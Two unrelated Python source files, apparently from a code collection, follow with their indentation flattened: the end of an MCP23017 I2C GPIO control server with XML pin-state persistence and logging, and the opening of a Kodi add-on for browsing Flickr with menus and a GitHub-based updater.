# Current state is low (0x0), and toggling needs to go to high briefly
self._log.info(2, "Toggling pin [0x{:0{}X}] on board [0x{:0{}X}] from LOW to HIGH".format(pin_nr, 2, board_id, 2))
self.SetI2CPin(board_id, pin_nr)
time.sleep(TOGGLEDELAY)
self.ClearI2CPin(board_id, pin_nr)
self._log.info(2, "Toggled pin [0x{:0{}X}] on board [0x{:0{}X}] back from HIGH to LOW".format(pin_nr, 2, board_id, 2))
if current_state == 0x1:
# Current state is high (0x1 or more), and toggling needs to go to low briefly
self._log.info(2, "Toggling pin [0x{:0{}X}] on board [0x{:0{}X}] from HIGH to LOW".format(pin_nr, 2, board_id, 2))
self.ClearI2CPin(board_id, pin_nr)
time.sleep(TOGGLEDELAY)
self.SetI2CPin(board_id, pin_nr)
self._log.info(2, "Toggled pin [0x{:0{}X}] on board [0x{:0{}X}] back from LOW to HIGH".format(pin_nr, 2, board_id, 2))
self._log.info(2, "Releasing (0x{:0{}X}, 0x{:0{}X}) from the Toggle set".format(board_id, 2, pin_nr, 2))
# Make sure to remove the board/pin pair from the _toggle_set at the end, or the pin will be blocked for all other processing
self._toggle_set.remove((board_id, pin_nr))
else:
self._log.error(2, "Toggling pin failed for [0x{:0{}X}] on board [0x{:0{}X}]: could not initialize board.".format(pin_nr, 2, board_id, 2))
def BusIDBlinker(self, board_id = 0x20, num_flashes = 10):
"""
Test routine only, briefly switches pin 15 on the board on and off. It is used to find back a board in the rack.
Please mind that this is a specific routine which expects pin 15 of the MCP23017 to be set as output to an identification LED.
"""
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
for i in range(0, num_flashes):
self.ClearI2CPin(board_id,15)
time.sleep(0.5)
self.SetI2CPin(board_id,15)
time.sleep(0.5)
class xmlParameterHandler():
"""
A class to handle an XML config file that keeps track of boards that were processed.
This XML Parameter Handler is used at boot time, so that the DIR pins of the different boards
are set to their last remembered state. I.e. inputs are set back to inputs and outputs are
re-configured as outputs after the cold boot.
During the processing, the XML file is constantly updated when the DIR (input vs. output) of
a pin changes.
"""
def __init__(self, the_log, xml_file_name = ''):
# Copy logfile to local
self._log = the_log
# Only read config file if a name was provided
if (CONFIGURATION_FILE == '') and (xml_file_name == ''):
self._confdata = ET.fromstring(b'<DATA>\n <i2cboards>\n </i2cboards>\n</DATA>')
self._use_config_file = False
else:
self._use_config_file = True
from os.path import expanduser
# Set location of file, go default if no file given
if xml_file_name == "":
self._filename = "{}/{}".format(expanduser("~"), CONFIGURATION_FILE)
else:
self._filename = xml_file_name
# Create initial empty datastring
self.read_parameter_file()
@property
def get_all_boards(self):
return self._confdata[0]
def get_board_dir(self, board_id, port_id):
"""
Get the Direction value of a specific board
"""
return_value = "0xff"
if self._use_config_file:
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
if(isinstance(port_id, int)):
port_id = '0x{:0{}X}'.format(port_id,2)
have_found_lev1 = False
for child in self._confdata[0]:
have_found_lev2 = False
if child.attrib["name"] == board_id:
have_found_lev1 = True
for subchild in child:
if subchild.attrib["name"] == port_id:
return_value = subchild.text
have_found_lev2 = True
if (not(have_found_lev2)) or (len(child) != 2):
self._confdata[0].remove(child)
have_found_lev1 = False
if not(have_found_lev1):
self.CreateNewKey(board_id)
return return_value
def set_board_dir(self, board_id, port_id, newvalue):
"""
Set the Direction value for a specific board
"""
return_value = True
if self._use_config_file:
# if byte or integer given, update to hex byte
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
if(isinstance(port_id, int)):
port_id = '0x{:0{}X}'.format(port_id,2)
if(isinstance(newvalue, int)):
newvalue = '0x{:0{}X}'.format(newvalue,2)
# Verify if value already exists (and create key if not in the file yet)
comparevalue = self.get_board_dir(board_id, port_id)
# update board and port pair, and write back to paramete file
if comparevalue != newvalue:
for child in self._confdata[0]:
if child.attrib["name"] == board_id:
for subchild in child:
if subchild.attrib["name"] == port_id:
subchild.text = newvalue
return_value = self.write_parameter_file()
return return_value
def set_board_pin(self, board_id, pin_nr):
"""
Set the pin value of the Direction register for a specific board
"""
return_value = True
if self._use_config_file:
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
currentvalue = self.get_board_dir(board_id, port_id)
if(isinstance(currentvalue,str)):
currentvalue = int(currentvalue, 16)
newvalue = currentvalue | (1 << pin_nr)
return_value = self.set_board_dir(board_id, port_id, newvalue)
return return_value
def clear_board_pin(self, board_id, pin_nr):
"""
Clear the pin value of the Direction register for a specific board
"""
return_value = True
if self._use_config_file:
# Verify if inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
currentvalue = self.get_board_dir(board_id, port_id)
if(isinstance(currentvalue,str)):
currentvalue = int(currentvalue, 16)
newvalue = currentvalue & ~(1 << pin_nr)
return_value = self.set_board_dir(board_id, port_id, newvalue)
return return_value
def DeleteKey(self, board_id):
"""
Clear the Key in the XML file for a board that is apparently no longer used.
"""
return_value = True
if self._use_config_file:
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
have_found = False
for child in self._confdata[0]:
if child.attrib["name"] == board_id:
have_found = True
self._confdata[0].remove(child)
if have_found:
return_value = self.write_parameter_file()
return return_value
def CreateNewKey(self, board_id):
"""
Create a new Key in the XML file and set the initial values to OUTPUT (0xff).
"""
return_value = True
if self._use_config_file:
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
# make sure you are not creating a key that already exists
self.DeleteKey(board_id)
attrib = {'name': board_id}
element = self._confdata[0].makeelement('board', attrib)
self._confdata[0].append(element)
index = len(self._confdata[0]) - 1
attrib = {'name': '0x{:0{}X}'.format(IODIRA,2)}
element = self._confdata[0][index].makeelement('port', attrib)
element.text = ALLOUTPUTS
self._confdata[0][index].append(element)
attrib = {'name': '0x{:0{}X}'.format(IODIRB,2)}
element = self._confdata[0][index].makeelement('port', attrib)
element.text = ALLOUTPUTS
self._confdata[0][index].append(element)
return_value = self.write_parameter_file()
return return_value
def read_parameter_file(self):
"""
Read the XML parameter file from the current home directory. Create an empty new one if nothing exists.
"""
return_value = True
if self._use_config_file:
if os.path.exists(self._filename):
self._log.info(2, "Reading Config XML file")
try:
# Read file, this will fail if the file does not exist (yet)
ConfTree = ET.parse(self._filename)
self._confdata = ConfTree.getroot()
except:
self._log.info(2, "Reading Config file FAILED. Creating a new one. ")
self._confdata = ET.fromstring(b'<DATA>\n <i2cboards>\n </i2cboards>\n</DATA>')
return_value = self.write_parameter_file()
else:
self._confdata = ET.fromstring(b'<DATA>\n <i2cboards>\n </i2cboards>\n</DATA>')
return_value = self.write_parameter_file()
return return_value
def write_parameter_file(self):
"""
Write the XML parameter file to the current home directory. Just try ...
"""
return_value = True
if self._use_config_file:
self._log.info(2, "Writing Config file. ")
try:
self.xml_pretty_print(self._confdata[0])
outString = ET.tostring(self._confdata)
outFile = open(self._filename,"w")
outFile.write(outString.decode('ascii'))
outFile.close()
return_value = True
except Exception as err:
return_value = False
# Disable further write attempts if the file cannot be written.
self._use_config_file = False
if LOG_LEVEL > 0:
print("Could not write parameter file [{}]. Error: {}".format(self._filename, err))
self._log.info("Could not write parameter file [{}]. Error: {}".format(self._filename, err))
return return_value
def xml_pretty_print(self, element, level=0):
"""
Format the XML data as properly indented items for better reading.
"""
# Inspired by https://norwied.wordpress.com/2013/08/27/307/
# Kudos go to Norbert and Chris G. Sellers
padding = ' '
indent = "\n{}".format(padding * level)
if len(element):
if not element.text or not element.text.strip():
element.text = "{} ".format(indent)
if not element.tail or not element.tail.strip():
element.tail = indent
for elem in element:
self.xml_pretty_print(elem, level+1)
if not element.tail or not element.tail.strip():
element.tail = indent
else:
if level and (not element.tail or not element.tail.strip()):
element.tail = indent
class LogThis():
"""
A class for keeping track of the logging.
If logging is requested, errors are tracked in the log file if the level is > 0. At high verbosity (level 2),
all actions are logged for debugging purposes.
"""
def __init__(self):
# Set Logging details
if LOG_LEVEL > 0:
self._log_enabled = True
try:
from os.path import expanduser
# Set location of file, go default if no file given
self._filename = "{}/{}".format(expanduser("~"), LOG_FILE)
self.log_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
self.my_handler = RotatingFileHandler(self._filename, mode='a', maxBytes=10*1024*1024, backupCount=2, encoding=None, delay=0)
self.my_handler.setFormatter(self.log_formatter)
self.my_handler.setLevel(logging.INFO)
self.app_log = logging.getLogger('root')
self.app_log.setLevel(logging.INFO)
self.app_log.addHandler(self.my_handler)
except Exception as err:
self._log_enabled = False
if LOG_LEVEL > 0:
print("Error while creating log file: {}. ".format(str(err)))
else:
self._log_enabled = False
def info(self, info_level, info_text):
if self._log_enabled:
if (LOG_LEVEL > 1) or (info_level == LOG_LEVEL):
self.app_log.info(info_text)
def debug(self, info_level, info_text):
if self._log_enabled:
if (LOG_LEVEL > 1) or (info_level == LOG_LEVEL):
self.app_log.debug(info_text)
def error(self, info_level, info_text):
if self._log_enabled:
if (LOG_LEVEL > 1) or (info_level == LOG_LEVEL):
self.app_log.error(info_text)
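# Usage sketch (not part of the original): LogThis is instantiated once in
# main() below. The first argument of info()/debug()/error() is the verbosity
# level the message belongs to, the second is the message text, e.g.:
# my_log = LogThis()
# my_log.info(2, "verbose status message")
# my_log.error(1, "something went wrong")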
def InitBusAtBoot(the_log, xmldata, i2chandler):
"""
If the program starts first time, pull the remembered boards from the XML config file. Set the proper input/output pin states to the last ones remembered.
"""
# Read the configured boards from the config file
the_log.info(2, "Reading board information from XML parameter file.")
boarddata = xmldata.get_all_boards
# Process boards one by one
for board in boarddata:
# Get the board ID (hex board number)
board_id = board.attrib["name"]
# Process both ports in the MCP23017 board (if configured both)
for port in board:
# Get Port A or B ID
port_id = port.attrib["name"]
# print error message to the systemctl log file
if LOG_LEVEL == 2:
print("Port [{}] of board [{}] should be set to [{}]".format(port_id, board_id, port.text))
the_log.info(2, "Port [{}] of board [{}] should be set to [{}]".format(port_id, board_id, port.text))
# Write the I/O state to the port
if not(i2chandler.WriteI2CDir(board_id, port_id, port.text)):
if LOG_LEVEL == 2:
print("That didn't work for board [{}]".format(board_id))
the_log.info(2, "That didn't work for board [{}]".format(board_id))
# If that didn't work, the board may have been removed before booting. Remove it from the config file.
xmldata.DeleteKey(board_id)
def main():
"""
Main program function.
"""
# Start a logger and provide info
my_log = LogThis()
my_log.info(1, "mcp23017server starting, running version [{}].".format(VERSION))
# Parameter file for board input/output configurations
my_log.info(2, "Creating XML Parameter Handler")
xmldata = xmlParameterHandler(my_log)
# Separate I2C handler, including a Mutex to make sure other clients are not messing with the I2C bus
my_log.info(2, "Creating I2C Communication Handler")
i2chandler = i2cCommunication(my_log)
# Initialize the I2C bus at first run (manual run), or at boot time (if set up as a service).
my_log.info(2, "Initializing I2C devices")
InitBusAtBoot(my_log, xmldata, i2chandler)
# Set up a new broker - this is the main part of the software.
my_log.info(2, "Creating a Message Broker")
mybroker = mcp23017broker(my_log, i2chandler, xmldata)
# Process commands forever
while True:
mybroker.service_commands()
# Not reached during normal operation: the service loop above runs forever.
my_log.error(1, "FATAL EXIT: service loop terminated unexpectedly.")
# Do a controlled exit with fail code. Trigger the OS to restart the service if configured.
sys.exit(1)
if __name__ == "__main__":
"""
Entry point when program is called from the command line.
"""
main()
|
flickrexplorer.py
|
# -*- coding: utf-8 -*-
# Python 3 compatibility:
from __future__ import absolute_import # look up top-level packages first instead of the current directory
from __future__ import division # // -> int, / -> float
from __future__ import print_function # Python 2 statement -> function
from kodi_six import xbmc, xbmcaddon, xbmcplugin, xbmcgui, xbmcvfs
# no effect on the unicode strings in Python 3:
from kodi_six.utils import py2_encode, py2_decode
import os, sys
PYTHON2 = sys.version_info.major == 2
PYTHON3 = sys.version_info.major == 3
if PYTHON2:
from urllib import quote, unquote, quote_plus, unquote_plus, urlencode, urlretrieve
from urllib2 import Request, urlopen, URLError
from urlparse import urljoin, urlparse, urlunparse, urlsplit, parse_qs
elif PYTHON3:
from urllib.parse import quote, unquote, quote_plus, unquote_plus, urlencode, urljoin, urlparse, urlunparse, urlsplit, parse_qs
from urllib.request import Request, urlopen, urlretrieve
from urllib.error import URLError
try: # https://github.com/xbmc/xbmc/pull/18345 (Matrix 19.0-alpha 2)
xbmc.translatePath = xbmcvfs.translatePath
except:
pass
# Python
import ssl					# HTTPS handshake
from io import BytesIO		# Python 2+3 -> get_page (compressed content), replacement for StringIO
import gzip, zipfile
from threading import Thread # thread_getpic
import shutil # thread_getpic
import json					# json -> text strings
import re					# regular expressions, among others
import math					# for math.ceil (round up)
import resources.lib.updater as updater
# Addon modules + function targets (util_imports.py)
import resources.lib.util_flickr as util
PLog=util.PLog; check_DataStores=util.check_DataStores; make_newDataDir=util. make_newDataDir;
Dict=util.Dict; name=util.name; ClearUp=util.ClearUp;
UtfToStr=util.UtfToStr; addDir=util.addDir; R=util.R; RLoad=util.RLoad; RSave=util.RSave;
repl_json_chars=util.repl_json_chars; mystrip=util.mystrip; DirectoryNavigator=util.DirectoryNavigator;
stringextract=util.stringextract; blockextract=util.blockextract;
cleanhtml=util.cleanhtml; decode_url=util.decode_url; unescape=util.unescape;
transl_json=util.transl_json; repl_json_chars=util.repl_json_chars; seconds_translate=util.seconds_translate;
get_keyboard_input=util.get_keyboard_input; L=util.L; RequestUrl=util.RequestUrl; PlayVideo=util.PlayVideo;
make_filenames=util.make_filenames; CheckStorage=util.CheckStorage; MyDialog=util.MyDialog;
del_slides=util.del_slides;
# +++++ FlickrExplorer - Kodi addon version, migrated from the Plex Media Server version +++++
VERSION = '0.7.4'
VDATE = '26.09.2021'
#
#
#
# (c) 2019 by Roland Scholz, rols1@gmx.de
#
# Licensed under MIT License (MIT)
# (previously licensed under GPL 3.0)
# A copy of the License you find here:
# https://github.com/rols1/Kodi-Addon-FlickrExplorer/blob/master/LICENSE.md
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# Flickr: https://www.flickr.com/
# Wikipedia: https://de.wikipedia.org/wiki/Flickr
FANART = 'art-flickr.png'			# background
ICON_FLICKR = 'icon-flickr.png'
ICON_SEARCH = 'icon-search.png'
ICON_FOLDER = 'Dir-folder.png'
ICON_OK = "icon-ok.png"
ICON_WARNING = "icon-warning.png"
ICON_NEXT = "icon-next.png"
ICON_CANCEL = "icon-error.png"
ICON_MEHR = "icon-mehr.png"
ICON_MEHR_1 = "icon-mehr_1.png"
ICON_MEHR_10 = "icon-mehr_10.png"
ICON_MEHR_100 = "icon-mehr_100.png"
ICON_MEHR_500 = "icon-mehr_500.png"
ICON_WENIGER_1 = "icon-weniger_1.png"
ICON_WENIGER_10 = "icon-weniger_10.png"
ICON_WENIGER_100 = "icon-weniger_100.png"
ICON_WENIGER_500 = "icon-weniger_500.png"
ICON_WORK = "icon-work.png"
ICON_GALLERY = "icon-gallery.png"
ICON_MAIN_UPDATER = 'plugin-update.png'
ICON_UPDATER_NEW = 'plugin-update-new.png'
ICON_INFO = "icon-info.png"
NAME = 'FlickrExplorer'
BASE = "https://www.flickr.com"
GALLERY_PATH = "https://www.flickr.com/photos/flickr/galleries/"
PHOTO_PATH = "https://www.flickr.com/photos/"
REPO_NAME = 'Kodi-Addon-FlickrExplorer'
GITHUB_REPOSITORY = 'rols1/' + REPO_NAME
REPO_URL = 'https://github.com/{0}/releases/latest'.format(GITHUB_REPOSITORY)
PLog('Addon: lade Code')
PluginAbsPath = os.path.dirname(os.path.abspath(__file__))		# absolute path for file operations
RESOURCES_PATH = os.path.join("%s", 'resources') % PluginAbsPath
ADDON_ID = 'plugin.image.flickrexplorer'
SETTINGS = xbmcaddon.Addon(id=ADDON_ID)
ADDON_NAME = SETTINGS.getAddonInfo('name')
SETTINGS_LOC = SETTINGS.getAddonInfo('profile')
ADDON_PATH = SETTINGS.getAddonInfo('path')
ADDON_VERSION = SETTINGS.getAddonInfo('version')
PLUGIN_URL = sys.argv[0]
HANDLE = int(sys.argv[1])
PLog("ICON: " + R(ICON_FLICKR))
TEMP_ADDON = xbmc.translatePath("special://temp")
USERDATA = xbmc.translatePath("special://userdata")
ADDON_DATA = os.path.join("%s", "%s", "%s") % (USERDATA, "addon_data", ADDON_ID)
PLog("ADDON_DATA: " + ADDON_DATA)
DICTSTORE = os.path.join("%s/Dict") % ADDON_DATA
SLIDESTORE = os.path.join("%s/slides") % ADDON_DATA
PLog(DICTSTORE);
check = check_DataStores()		# check / initialization / migration
PLog('check: ' + str(check))
try: # 28.11.2019 exceptions.IOError possible, e.g. iOS ARM (Thumb) 32-bit
from platform import system, architecture, machine, release, version # Debug
OS_SYSTEM = system()
OS_ARCH_BIT = architecture()[0]
OS_ARCH_LINK = architecture()[1]
OS_MACHINE = machine()
OS_RELEASE = release()
OS_VERSION = version()
OS_DETECT = OS_SYSTEM + '-' + OS_ARCH_BIT + '-' + OS_ARCH_LINK
OS_DETECT += ' | host: [%s][%s][%s]' %(OS_MACHINE, OS_RELEASE, OS_VERSION)
except:
OS_DETECT =''
KODI_VERSION = xbmc.getInfoLabel('System.BuildVersion')
PLog('Addon: ClearUp')
ARDStartCacheTime = 300			# 5 min.
# Dict: simple replacement for the Dict module from the Plex framework
days = SETTINGS.getSetting('DICT_store_days')
if days == 'delete':			# delete the slides folder
del_slides(SLIDESTORE)
SETTINGS.setSetting('DICT_store_days','100')
xbmc.sleep(100)
days = 100
else:
days = int(days)
Dict('ClearUp', days)			# clean up Dict
####################################################################################################
# Selection of the language file / browser locale setting
# For locale problems under Plex see the Plex version
# Here the Plex function Locale.LocalString is replaced by a simple text comparison -
# see util.L
# Kodi does not refresh automatically, hence the refresh is done in home each time.
def ValidatePrefs():
PLog('ValidatePrefs:')
try:
lang = SETTINGS.getSetting('language').split('/')		# format example: "English/en/en_GB"
loc = str(lang[1]) # en
if len(lang) >= 2:
loc_browser = str(lang[2]) # en_GB
else:
loc_browser = loc				# identifiers are identical
except Exception as exception:
PLog(repr(exception))
loc = 'en'						# fallback (problem with the setting)
loc_browser = 'en-US'
loc_file = os.path.join("%s", "%s", "%s") % (RESOURCES_PATH, "Strings", '%s.json' % loc)
PLog(loc_file)
if os.path.exists(loc_file) == False:	# fallback language file: English
loc_file = os.path.join("%s", "%s", "%s") % (RESOURCES_PATH, "Strings", 'en.json')
Dict('store', 'loc', loc)
Dict('store', 'loc_file', loc_file)
Dict('store', 'loc_browser', loc_browser)
PLog('loc: %s' % loc)
PLog('loc_file: %s' % loc_file)
PLog('loc_browser: %s' % loc_browser)
####################################################################################################
def Main():
PLog('Main:');
PLog('Addon-Version: ' + VERSION); PLog('Addon-Datum: ' + VDATE)
PLog(OS_DETECT)
PLog('Addon-Python-Version: %s' % sys.version)
PLog('Kodi-Version: %s' % KODI_VERSION)
PLog(PluginAbsPath)
ValidatePrefs()
li = xbmcgui.ListItem()
title=L('Suche') + ': ' + L('im oeffentlichen Inhalt')
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Search", fanart=R(ICON_SEARCH), thumb=R(ICON_SEARCH),
fparams=fparams, summary=L('Suchbegriff im Suchfeld eingeben und Return druecken'))
if SETTINGS.getSetting('username'):		# MyFlickr menu for logged-in users
summ = 'User: ' + SETTINGS.getSetting('username')
fparams="&fparams={}"
addDir(li=li, label='MyFlickr', action="dirList", dirID="MyMenu", fanart=R('icon-my.png'), thumb=R('icon-my.png'),
fparams=fparams, summary=summ)
title=L('Photostream')
summ = L('Fotos') + ' ' + L('im oeffentlichen Inhalt')
fparams="&fparams={'query': 'None', 'user_id': 'None'}"
addDir(li=li, label=title, action="dirList", dirID="Search_Work", fanart=R('icon-stream.png'), thumb=R('icon-stream.png'),
fparams=fparams, summary=summ)
title = L('Web Galleries')
fparams="&fparams={'pagenr': '1'}"
addDir(li=li, label=title, action="dirList", dirID="WebGalleries", fanart=R(ICON_GALLERY), thumb=R(ICON_GALLERY),
fparams=fparams)
title = L('Flickr Nutzer')
summ = L("Suche Nutzer und ihre Inhalte") + ': ' + str(SETTINGS.getSetting('FlickrPeople'))
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R('icon-user.png'), thumb=R('icon-user.png'),
fparams=fparams, summary=summ)
# hook in the updater module:
repo_url = 'https://github.com/{0}/releases/'.format(GITHUB_REPOSITORY)
call_update = False
if SETTINGS.getSetting('pref_info_update') == 'true':	# update notice when the addon starts
ret = updater.update_available(VERSION)
if ret[0] == False:
msg1 = L("Github ist nicht errreichbar")
msg2 = 'update_available: False'
PLog("%s | %s" % (msg1, msg2))
MyDialog(msg1, msg2, '')
else:
int_lv = ret[0]					# version on Github
int_lc = ret[1]					# current version
latest_version = ret[2]			# Github version, format 1.4.1
if int_lv > int_lc:				# show the "install" update button
call_update = True
title = 'neues Update vorhanden - jetzt installieren'
summary = 'Addon aktuell: ' + VERSION + ', neu auf Github: ' + latest_version
# e.g.: https://github.com/rols1/Kodi-Addon-ARDundZDF/releases/download/0.5.4/Kodi-Addon-ARDundZDF.zip
url = 'https://github.com/{0}/releases/download/{1}/{2}.zip'.format(GITHUB_REPOSITORY, latest_version, REPO_NAME)
url=py2_encode(url);
fparams="&fparams={'url': '%s', 'ver': '%s'}" % (quote_plus(url), latest_version)
addDir(li=li, label=title, action="dirList", dirID="resources.lib.updater.update", fanart=R(FANART),
thumb=R(ICON_UPDATER_NEW), fparams=fparams, summary=summary)
if call_update == False:		# show the "search for update" button
title = 'Addon-Update | akt. Version: ' + VERSION + ' vom ' + VDATE
summary='Suche nach neuen Updates starten'
tagline='Bezugsquelle: ' + repo_url
fparams="&fparams={'title': 'Addon-Update'}"
addDir(li=li, label=title, action="dirList", dirID="SearchUpdate", fanart=R(FANART),
thumb=R(ICON_MAIN_UPDATER), fparams=fparams, summary=summary, tagline=tagline)
# Info-Button
summary = L('Stoerungsmeldungen an Forum oder rols1@gmx.de')
tagline = u'für weitere Infos (changelog.txt) klicken'
path = os.path.join(ADDON_PATH, "changelog.txt")
title = u"Änderungsliste (changelog.txt)"
path=py2_encode(path); title=py2_encode(title);
fparams="&fparams={'path': '%s', 'title': '%s'}" % (quote(path), quote(title))
addDir(li=li, label='Info', action="dirList", dirID="ShowText", fanart=R(FANART), thumb=R(ICON_INFO),
fparams=fparams, summary=summary, tagline=tagline)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=False)
#----------------------------------------------------------------
def ShowText(path, title):
PLog('ShowText:');
page = RLoad(path, abs_path=True)
page = page.replace('\t', ' ')	# replace tabs with blanks
dialog = xbmcgui.Dialog()
dialog.textviewer(title, page)
return
#----------------------------------------------------------------
# sender reassigned in the channel selection (Classic: disabled)
####################################################################################################
# Dual use of MyMenu: SETTINGS.getSetting('username') + FlickrPeople
#
# Return from MyMenu/user -> Main
# Return from MyMenu/SETTINGS.getSetting('username') -> FlickrPeople
# Return from submenus without user_id -> Main
# Return from submenus with user_id -> MyMenu
#
def home(li,user_id,username='', returnto=''):
PLog('home:')					# configured user (settings)
PLog('user_id: %s, username: %s, returnto: %s' % (str(user_id), str(username), str(returnto)))
li = xbmcgui.ListItem()
if returnto == 'FlickrPeople': # MyMenu -> FlickrPeople
title = py2_decode(L('Zurueck zu')) + ' ' + py2_decode(L('Flickr Nutzer'))
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R('homePeople.png'),
thumb=R('homePeople.png'), fparams=fparams)
return li
if returnto == 'Main':
title = L('Zurueck zum Hauptmenue')		# MyMenu -> main menu
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R('home.png'),
thumb=R('home.png'), fparams=fparams)
return li
if user_id:						# submenus: user (SETTINGS.getSetting('username') or Flickr People)
if username == '':
user_id,nsid,username,realname = GetUserID(user_id)
title = py2_decode(L('Zurueck zu')) + ' ' + username
username=py2_encode(username); user_id=py2_encode(user_id);
fparams="&fparams={'username': '%s', 'user_id': '%s'}" % (quote(username), quote(user_id))
addDir(li=li, label=title, action="dirList", dirID="MyMenu", fanart=R('homePeople.png'),
thumb=R('homePeople.png'), fparams=fparams)
return li
title = L('Zurueck zum Hauptmenue')		# submenus: without user_id
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R('home.png'), thumb=R('home.png'), fparams=fparams)
return li
####################################################################################################
# User-dependent menus
# Used in two ways:
# 1. caller Main - for the user from the settings SETTINGS.getSetting('username')
# 2. caller FlickrPeople - for a user selected in FlickrPeople
#
def MyMenu(username='',user_id=''):
PLog('MyMenu:')
PLog('user_id: %s, username: %s' % (str(user_id), str(username)))
if username=='' and user_id=='':	# from Main, user from the settings
if SETTINGS.getSetting('username'):
user = SETTINGS.getSetting('username').strip()
user_id,nsid,username,realname = GetUserID(user)
# additionally store the result in Dicts (not for users selected via FlickrPeople):
Dict('store', 'user', user); Dict('store', 'nsid', nsid); Dict('store', 'username', username);
Dict('store', 'realname', realname);
PLog('user_id: %s, nsid: %s, username: %s, realname: %s' % (user_id,nsid,username,realname))
if 'User not found' in user_id:		# error code from GetUserID
msg1 = L("User not found") + ': %s' % user
MyDialog(msg1, '', '')
return
PLog(Dict('load','nsid'))
nsid = user_id
if nsid == Dict('load','nsid'):
returnto ='Main'
else:
returnto ='FlickrPeople'
li = xbmcgui.ListItem()
li = home(li, user_id=user_id, returnto=returnto) # Home-Button
title = 'Search: content owned by %s' % (username)
summ = L('Suche') + ' ' + L('Fotos')
title=py2_encode(title);
fparams="&fparams={'user_id': '%s', 'title': '%s'}" % (nsid, quote(title))
addDir(li=li, label=title, action="dirList", dirID="Search", fanart=R(ICON_SEARCH), thumb=R(ICON_SEARCH),
fparams=fparams, summary=summ)
title='%s: Photostream' % username
fparams="&fparams={'query': '%s', 'user_id': '%s'}" % (quote('&Photostream&'), nsid)
addDir(li=li, label=title, action="dirList", dirID="Search_Work", fanart=R('icon-stream.png'), thumb=R('icon-stream.png'),
fparams=fparams, summary=title)
title='%s: Albums' % username
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'user_id': '%s', 'pagenr': '1'}" % ( quote(title), nsid)
addDir(li=li, label=title, action="dirList", dirID="MyAlbums", fanart=R('icon-album.png'), thumb=R('icon-album.png'),
fparams=fparams, summary=title)
title='%s: Galleries' % username
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'user_id': '%s'}" % (quote(title), nsid)
addDir(li=li, label=title, action="dirList", dirID="MyGalleries", fanart=R('icon-gallery.png'),
thumb=R('icon-gallery.png'), fparams=fparams, summary=title)
title='%s: Faves' % username
fparams="&fparams={'query': '%s', 'user_id': '%s'}" % (quote('&Faves&'), nsid)
addDir(li=li, label=title, action="dirList", dirID="Search_Work", fanart=R('icon-fav.png'), thumb=R('icon-fav.png'),
fparams=fparams, summary=title)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=False)
#------------------------------------------------------------------------------------------
# The number of items is fixed at a limit of 100. No setting is offered, because Flickr handles the
# quantities inconsistently (paged, single, none). E.g. galleries.getList returns only 1 page - the
# "more" jumps therefore use max_count=100.
# Flickr output is in XML format.
def MyGalleries(title, user_id, offset=0):
PLog('MyGalleries:'); PLog('offset: ' + str(offset))
offset = int(offset)
title_org = title
max_count = 100					# fixed limit, same as the Flickr default
path = BuildPath(method='flickr.galleries.getList', query_flickr='', user_id=user_id, pagenr=1)
page, msg = RequestUrl(CallerName='MyGalleries', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100])
cnt = stringextract('total="', '"', page)		# in the header
pages = stringextract('pages="', '"', page)
PLog('Galleries: %s, Seiten: %s' % (cnt, pages))
if cnt == '0' or pages == '':
msg1 = L('Keine Gallerien gefunden')
MyDialog(msg1, '', '')
return
li = xbmcgui.ListItem()
li = home(li, user_id=user_id) # Home-Button
records = blockextract('<gallery id', '', page)
pagemax = int(len(records))
PLog('total: ' + str(pagemax))
i=0 + offset
loop_i = 0						# loop counter
# PLog(records[i])
for r in records:
title = stringextract('<title>', '</title>', records[i])
title = unescape(title)
url = stringextract('url="', '"', records[i])
username = stringextract('username="', '"', records[i])
count_photos = stringextract('count_photos="', '"', records[i])
summ = '%s: %s %s' % (username, count_photos, L('Fotos'))
img_src = R(ICON_FLICKR)
i=i+1; loop_i=loop_i+1
if i >= pagemax:
break
if loop_i > max_count:
break
gallery_id = url.split('/')[-1]			# e.g. 72157697209149355
if url.endswith('/'):
gallery_id = url.split('/')[-2]			# URL ending without / for FlickrPeople
PLog(i); PLog(url);PLog(title);PLog(img_src); PLog(gallery_id);
title=py2_encode(title);
fparams="&fparams={'title': '%s', 'gallery_id': '%s', 'user_id': '%s'}" % (quote(title), gallery_id, user_id)
addDir(li=li, label=title, action="dirList", dirID="Gallery_single", fanart=R(img_src), thumb=R(img_src),
